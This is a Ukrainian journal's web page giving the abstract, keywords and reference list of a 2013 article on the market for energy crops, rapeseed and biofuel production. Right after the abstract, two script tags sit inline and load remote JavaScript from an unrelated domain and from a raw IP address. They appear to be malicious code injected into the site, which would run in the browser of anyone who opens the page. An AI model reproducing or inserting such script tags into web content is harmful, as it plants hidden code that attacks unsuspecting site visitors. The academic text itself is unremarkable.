ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43:633.85
Сторінка молодого науковця

Еколого-економічні особливості формування ринку енергетичних сільськогосподарських культур / Кравчук О. О. // Економіка АПК. - 2013. - № 5 - С. 135

Досліджено еколого-економічні особливості розвитку ринку енергетичних культур як основи фор-мування сировинної бази для виробництва біопалива, визначено основні механізми його стимулювання. Запропоновано напрями використання енергетичних культур для виробництва рідких біопалив. Проаналізовано сучасний стан виробництва насіння ріпаку як однієї з перспективних енергетичних культур в Україні, оцінено перспективи розвитку сировинної бази для біопаливної промисловості. Обґрунтовано умови формування інфраструктури виробництва рослинної сировини для одержання паливних матеріалів рослинного походження. Визначено інструменти стимулювання виробництва біопалива і запропоновано шляхи економічного впливу на взаємини між сільськогосподарським та енергетичним ринками. До основних інструментів стимулювання виробництва біопалива віднесено: субсидії на виробництво і розподіл, обов'язкове змішування біопалива з паливом на основі нафти, податкові стимули й пільги. Табл.: 1. Рис.: 2. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ринок, енергетичні культури, сировинна база, біопаливо, еколого-економічні особливості, сільське господарство

Список використаних джерел

  1. Гавриш В.І. Визначення доцільності виробництва біопалив за укрупненими показниками / В.І. Гавриш // Економіка АПК. – 2010. – № 2. – С. 31-35.
  2. Гойсюк Л.В. Формування сировинної бази виробництва біоетанолу в Україні / Л. В. Гойсюк // Наука й економіка. – Хмельницький, 2010. – Вип. 2 (18). – С. 161–164.
  3. Зіновчук Н.В. Еколого-економічні обмеження біоенергетичного виробництва в Україні / Н.В. Зіновчук, О.В. Скидан // Зб. наук. праць Вінницького нац. аграр. ун-ту. – 2010. – Вип. 42. – Т.4. – С. 102–106.
  4. Калетник Г.М. Розвиток ринку біопалив в Україні: [моногр.] / Г.М. Калетник. – К.: Аграрна наука, 2008. – 464 с.
  5. Самойленко А.Г. Оцінка потенціалу аграрної сировинної бази для виробництва біопалива / А.Г. Самойленко // Економіка та підприємництво: зб. наук. праць молодих учених та аспірантів. – 2009. – Вип. 22. – С. 177–185.
  6. Сільське господарство України за 2011 рік: Стат. зб. / [за ред. Н.С. Власенко]. – К.: Державна служба статистики України, 2012. – 386 с.
  7. Чибіскова Г.С. Стимулювання вирощування сировини для виробництва біопалива в Україні / Г. С.Чибіскова // Актуальні проблеми економіки. – 2007. – № 4 (82). – С. 104 – 113.
  8. Шпичак О.М. Економічні проблеми виробництва біопалива та продовольча безпека України / О.М. Шпичак // Економіка АПК. – 2009. – № 8. – С. 11-19.
  9. Doornbosch R. Biofuels: is the cure worse than the disease? / R. Doornbosch, R. Steenblik // Рrepared for the Round Table on Sustainable Development, 11–12 Sept. 2007. – Paris : Organisation for Economic Co-operation and Development.
  10. Msangi S. 2008. Biofuels, food prices and food security [Електронний ресурс] / S. Msangi; FAO, Rome, 18–20 Febr. 2008. – Режим доступу: www.fao.org/.
Читати статтю: 13_05_22.pdf